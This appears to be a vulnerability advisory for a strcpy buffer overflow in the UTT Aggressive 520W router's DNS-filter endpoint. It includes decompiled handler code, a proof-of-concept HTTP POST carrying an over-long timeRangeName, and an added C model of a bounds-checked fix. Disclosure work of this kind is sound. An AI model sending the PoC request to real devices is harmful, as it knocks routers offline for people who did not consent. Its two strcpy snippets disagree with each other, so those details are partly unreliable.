### Key Vulnerability Information

- **Vendor of the Products**: UTT
- **Affected Product**: Aggressive 520W Router
- **Affected Firmware Version**: <=v3v1.7.7-180627

#### Overview

The UTT Aggressive 520W router contains a critical buffer overflow vulnerability. An attacker who can reach the `/goform/formConfigDnsFilterGlobal` endpoint can supply an over-long parameter value, triggering a buffer overflow that leads to a denial-of-service condition. The overflow occurs in the following unbounded copy:

```c
strcpy((char *)(InstPointByName + 20), Var);
```

#### Vulnerability Details

The function `formDefineDnsFilter()` registers the handler for this endpoint with the following API call:

```c
websFormDefine((int)"formConfigDnsFilterGlobal", (int)sub_428044);
```

When the `sourceIP` parameter is set to `ipRange`, execution enters an `if` block in which the `timeRangeName` input is copied with `strcpy()` and never bounds-checked, so a value longer than the destination field overflows it:

```c
if ( !strcmp(v6, "ipRange") )
{
  *((_DWORD *)(InstPointByIndex + 108)) = 1;
  if ( !strcmp(v6, "ipRange") )
    goto LABEL_6;
LABEL_8:
  *((_DWORD *)(InstPointByIndex + 112)) = 0;
  *((_DWORD *)(InstPointByIndex + 116)) = v11;
  *((_DWORD *)(InstPointByIndex + 120)) = v12;
  strcpy((char *)(InstPointByIndex + 137), src_1);   /* unbounded copy of timeRangeName */
  if ( !strcmp(v8, ACCEPT) )
    goto LABEL_9;
  goto LABEL_13;
}
```

#### Proof of Concept (PoC)

```http
POST /goform/formConfigDnsFilterGlobal HTTP/1.1
Host: 192.168.1.1
Content-Length: 1822
Cache-Control: max-age=0
Authorization: Digest username="admin", realm="UTT", nonce="80758026511f147977ce8ea9363e038c", uri:
Origin: http://192.168.1.1
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*
Referer: http://192.168.1.1/IPMac.asp
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: language=zhcn; utt_bw_rdevType=; td_cookie=2522114788
Connection: close

sourceIP=ipRange&timeRangeName=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
```
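The following C model is an added illustration, not code from this advisory or from the UTT firmware: it mirrors the handler's control flow (`timeRangeName` consumed only when `sourceIP` is `ipRange`) and replaces the unbounded `strcpy()` with a length-checked copy that rejects over-long values. The struct layout, the 32-byte field size and all function names are assumptions made for the example.

```c
#include <string.h>

/* Hypothetical record layout (assumption: real firmware layout is unpublished). */
#define TIME_RANGE_NAME_LEN 32

struct dns_filter_inst {
    int  source_is_range;
    char time_range_name[TIME_RANGE_NAME_LEN];
    int  next_field;   /* whatever follows the buffer is what an overflow corrupts */
};

/* Bounded replacement for the advisory's strcpy(): refuse values that do not
 * fit (NUL terminator included) instead of truncating silently. */
int set_time_range_safe(struct dns_filter_inst *inst, const char *src)
{
    size_t n = strlen(src);
    if (n >= TIME_RANGE_NAME_LEN)
        return -1;                         /* caller turns this into an HTTP error */
    memcpy(inst->time_range_name, src, n + 1);
    return 0;
}

/* Hypothetical handler mirroring the advisory's control flow: timeRangeName is
 * consumed only when sourceIP == "ipRange". Returns an HTTP status code. */
int handle_config_dns_filter(struct dns_filter_inst *inst,
                             const char *source_ip, const char *time_range_name)
{
    if (strcmp(source_ip, "ipRange") != 0)
        return 200;                        /* other branches not modelled */
    inst->source_is_range = 1;
    if (set_time_range_safe(inst, time_range_name) != 0)
        return 400;                        /* Bad Request: value too long */
    return 200;
}

/* Runs one request against a fresh record and returns the status. */
int simulate_request(const char *source_ip, const char *time_range_name)
{
    struct dns_filter_inst inst = {0};
    return handle_config_dns_filter(&inst, source_ip, time_range_name);
}

/* Constructed input shaped like the PoC body: 100 'a' characters. */
const char *poc_style_name(void)
{
    static char buf[101];
    memset(buf, 'a', 100);
    buf[100] = '\0';
    return buf;
}
```

Link it with a `main()` that calls `simulate_request("ipRange", poc_style_name())`; the PoC-shaped value is answered with 400 instead of being written past the field.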